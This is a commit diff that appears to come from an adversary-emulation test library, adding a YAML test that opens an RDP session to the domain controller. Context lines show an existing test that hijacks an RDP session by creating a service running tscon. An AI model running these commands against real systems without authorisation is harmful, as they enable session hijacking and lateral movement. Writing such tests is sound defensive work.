T1076 rdp to domain controller (#572)
* Added MacOS and Linux isElevated check [toso: test MacOS] * Update Invoke-AtomicTest.ps1 * Update Invoke-AtomicTest.ps1 * Update Invoke-AtomicTest.ps1 * T1076 RDP To Domain Controller
This commit is contained in:
Andras32
@@ -19,3 +19,30 @@ atomic_tests:
|
||||
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
|
||||
net start sesshijack
|
||||
sc.exe delete sesshijack
|
||||
|
||||
- name: RDPto-DomainController
|
||||
description: |
|
||||
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
input_arguments:
|
||||
|
||||
logonserver:
|
||||
description: ComputerName argument default %logonserver%
|
||||
type: String
|
||||
default: $ENV:logonserver.TrimStart("\")
|
||||
|
||||
username:
|
||||
description: Username argument default %USERDOMAIN%\%username%
|
||||
type: String
|
||||
default: $Env:USERDOMAIN\$ENV:USERNAME
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
prereq_command: |
|
||||
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
|
||||
command: |
|
||||
Connect-RDP -ComputerName #{logonserver} -User #{username}
|
||||
|
||||
Reference in New Issue
Block a user